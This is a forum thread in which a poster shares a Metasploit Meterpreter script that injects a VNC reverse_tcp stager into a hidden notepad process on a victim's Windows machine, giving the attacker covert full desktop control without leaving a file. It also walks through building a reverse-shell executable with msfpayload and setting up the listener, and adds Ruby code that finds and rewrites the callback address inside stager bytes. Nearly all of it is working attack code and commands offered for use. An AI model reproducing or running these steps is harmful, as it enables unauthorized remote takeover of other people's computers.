
Thread: vnc memory injection with meterpreter

  1. #1
    hhmatt (Very good friend of the forum)
    Join Date: Jan 2010

    vnc memory injection with meterpreter

    A script that utilizes memory injection to get a VNC session without losing your meterpreter session.

    I spent quite a bit of time trying to get vnc_oneport.rb working. Then I finally decided that vnc.rb worked great except for one thing: it created a file on the victim's machine and you would have to manually delete it later. So I took the cool execution and injection feature that was in vnc_oneport.rb and ported it into vnc.rb.

    This is sort of a work in progress but I'll share what I've done so far to get it working. It's not as hard as it looks as long as you know how to get a meterpreter session.

    First we need to traverse to the directory that we will be putting our script into.

    Open a shell and type:
    cd /pentest/exploits/framework3/scripts/meterpreter/
    Use whatever editor you're most comfortable with here, but keep the name the same.
    nano vnc_mem.rb
    Now copy this:
    # $Id: vnc_mem.rb 12-17-2009 hdm $
    # Meterpreter script for obtaining a quick VNC session
    # Hybrid of vnc.rb and vnc_oneport.rb
    # Utilizes memory functions so no file is created
    # Known Issue: spawns metasploit courtesy shell on vnc server side (victim)
    # You can exit out of courtesy shell easily once you obtain a vnc session
    # All code written by H.D. Moore (hdm)
    # Edited by hhmatt
    session = client

    # Options
    opts = Rex::Parser::Arguments.new(
            "-h"  => [ false,  "This help menu"],
            "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
            "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
    #       "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
            "-e"  => [ true,   "The process to run and inject into (default: notepad.exe)"]
    )

    # Default parameters
    runme    = "notepad.exe"
    # No destination argument: the address of the interface that routes out is used
    rhost    = Rex::Socket.source_address
    rport    = 4545
    #autoconn = true

    # Option parsing
    opts.parse(args) do |opt, idx, val|
            case opt
            when "-h"
                    print_line(opts.usage)
                    raise Rex::Script::Completed
            when "-r"
                    rhost = val
            when "-p"
                    rport = val.to_i
    #       when "-D"
    #               autoconn = false
            when "-e"
                    runme = val
            end
    end

    # Create the VNC stager. The raw shellcode is what gets injected; the EXE is
    # only built to report its size, as vnc.rb does.
    print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport}")
    pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
    pay.datastore['LHOST'] = rhost
    pay.datastore['LPORT'] = rport
    raw  = pay.generate
    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
    print_status("VNC stager executable #{exe.length} bytes long")

    # Create a hidden host process and open a full-access handle to it
    pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
    print_status("Host process #{runme} has PID #{pid}")
    note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

    # Allocate executable memory in the host process and write the stager into it
    mem  = note.memory.allocate(1024*32)
    print_status("Allocated memory at address #{"0x%.8x" % mem}")
    print_status("Writing the VNC stager into memory...")
    note.memory.write(mem, raw)

    # Setup the multi/handler so the connect back is caught before the thread starts
    mul = client.framework.exploits.create("multi/handler")
    mul.datastore['PAYLOAD']   = "windows/vncinject/reverse_tcp"
    mul.datastore['LHOST']     = rhost
    mul.datastore['LPORT']     = rport
    mul.datastore['EXITFUNC']  = 'process'
    mul.datastore['ExitOnSession'] = true
    mul.exploit_simple(
            'Payload'        => mul.datastore['PAYLOAD'],
            'RunAsJob'       => true
    )

    # Execute the agent: a new thread in the host process starting at the stager
    print_status("Creating a new thread within #{runme} to run the VNC stager...")
    print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
    note.thread.create(mem, 0)
    And paste it into your editor.

    Then you can save and exit:
    Ctrl+o (the letter not the number zero)
    Nothing more needs to be done; Metasploit will load the script automatically when it starts.
    So let's start Metasploit!
    I'm using the reverse tcp metasploit connection from an executable payload. You can use whatever method you know or have to give you a meterpreter session.

    Ok so let's get our meterpreter session started.
    msf > use multi/handler
    msf(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf(handler) > show options
    At this point you will need to set LHOST and RPORT (remember to change these to match your network and port).
    LHOST is your attacker machine and LPORT is your port to listen on.
    msf(handler) > set LHOST
    msf(handler) > set LPORT 81
    OK. Let's start our listener now.
    msf(handler) > exploit
    At this point you should see something like this:
    [*] Starting the payload handler...
    [*] Started Reverse Handler on port 81
    Now we need to run our executable on the victim machine to give us a meterpreter session.
    This is how I made my exe.
    ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=81 X > /tmp/meter.exe
    This is what you should get at the end:
    meterpreter >
    This is a good point to make sure you're connected to the right machine.
    meterpreter > ipconfig
    meterpreter > getuid
    If you need to know some of the main basic commands that meterpreter uses just type in a ? like this.
    meterpreter > ?
    OK, now to see if our script is recognized.
    meterpreter > run vnc_mem.rb -h
    This should post the scripts help options.
    Here's what I get:
        -e <opt>  The process to run and inject into (default: notepad.exe)
        -h        This help menu
        -p <opt>  The port on the remote host where Metasploit is listening (default: 4545)
        -r <opt>  The IP of the system running Metasploit listening for the connect back
    Looks good, let's give it a run:
    meterpreter > run vnc_mem.rb
    At this point you should've received a new window open in tightvnc with your victim's desktop and full control!
    You can also check back on meterpreter and see that you still have an active session. Sometimes you have to hit enter once or twice to see the prompt.

    Hope you get some useful information from this and happy hacking!
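
    The script above writes `raw` (the generated windows/vncinject/reverse_tcp stager) straight into the host process, so it is worth checking what connect-back endpoint those bytes actually carry before they go into memory. The following is an added example, not part of hhmatt's script or of Metasploit: it scans a raw windows reverse_tcp stager for the LHOST/LPORT immediates and can re-point them. It assumes the stager builds its sockaddr_in with two pushes, `push <LHOST as 4 bytes>` (68 aa bb cc dd) followed by `push <AF_INET | LPORT in network order>` (68 02 00 pp pp), which is the layout of Metasploit's block_reverse_tcp; the function names, the 32 KB allocation check mirroring the script, and the sample bytes are all my own, and the sample is constructed filler, not real stager code.

```ruby
# Added example (not from hhmatt's script or Metasploit): inspect and
# re-point the connect-back endpoint inside a raw windows/*/reverse_tcp stager.
#
# Assumed stager layout (Metasploit block_reverse_tcp):
#   push <LHOST>                  -> 68 aa bb cc dd   (bytes in dotted-quad order)
#   push <AF_INET | htons(LPORT)> -> 68 02 00 pp pp   (port big-endian)
# Any other layout (bind stager, encoded payload) is out of scope and the
# scanner returns nil for it.
SOCKADDR_PUSHES = /\x68(.{4})\x68\x02\x00(.{2})/m

# Locate the LHOST/LPORT immediates in a binary string. Returns a hash with
# the decoded endpoint and the byte offsets of both immediates, or nil.
def find_endpoint(raw)
  m = SOCKADDR_PUSHES.match(raw.b)
  return nil unless m
  {
    lhost:    m[1].unpack('C4').join('.'),
    lport:    m[2].unpack1('n'),
    host_off: m.begin(1),
    port_off: m.begin(2),
  }
end

# Return a copy of the stager with a new endpoint written over the old
# immediates. Length and every other byte are unchanged, so the
# memory.allocate / memory.write steps in the script are unaffected.
def patch_endpoint(raw, lhost, lport)
  ep = find_endpoint(raw)
  raise ArgumentError, 'no reverse_tcp sockaddr pushes found' unless ep
  octets = lhost.split('.').map(&:to_i)
  unless octets.size == 4 && octets.all? { |o| o.between?(0, 255) }
    raise ArgumentError, "bad LHOST #{lhost}"
  end
  raise ArgumentError, "bad LPORT #{lport}" unless lport.between?(1, 65535)
  out = raw.b                      # String#b returns a binary copy
  out[ep[:host_off], 4] = octets.pack('C4')
  out[ep[:port_off], 2] = [lport].pack('n')
  out
end

# The script allocates 1024*32 bytes in the host process and writes `raw`
# into it without checking; this is the check it relies on implicitly.
def fits_allocation?(raw, size = 1024 * 32)
  raw.bytesize <= size
end

# Constructed sample (NOT real stager code): filler bytes around the two
# pushes for 127.0.0.1:4444, the defaults of an unconfigured stager.
SAMPLE_STAGER = [
  0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, # filler
  0x68, 0x7f, 0x00, 0x00, 0x01,                         # push 0x0100007f
  0x68, 0x02, 0x00, 0x11, 0x5c,                         # push 0x5c110002
  0x89, 0xe6, 0x50, 0x50, 0x50, 0x50,                   # filler
].pack('C*')

if __FILE__ == $0
  ep = find_endpoint(SAMPLE_STAGER)
  puts "stager calls back to #{ep[:lhost]}:#{ep[:lport]}"
  patched = patch_endpoint(SAMPLE_STAGER, '10.0.0.5', 4545)
  ep2 = find_endpoint(patched)
  puts "patched stager calls back to #{ep2[:lhost]}:#{ep2[:lport]} " \
       "(fits 32 KB: #{fits_allocation?(patched)})"
end
```

    In the script, `raw` is the value to pass to `find_endpoint` right after `pay.generate`, to confirm that LHOST/LPORT match the multi/handler before `note.memory.write` runs; the patcher is only useful if the callback address has to change after generation, since normally the datastore sets it.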

  2. #2
    cRaZylilmuffin (Junior Member)
    Join Date: Mar 2010


    Cool, I'll have to try it out.
    "Things are not what they appear to be: nor are they otherwise." -Surangama Sutra

  3. #3
    Good friend of the forums
    Join Date: Feb 2009


    Great work dude! Nice merge between the .rb's.

  4. #4
    hhmatt (Very good friend of the forum)
    Join Date: Jan 2010


    Thanks, I'm glad you liked it.
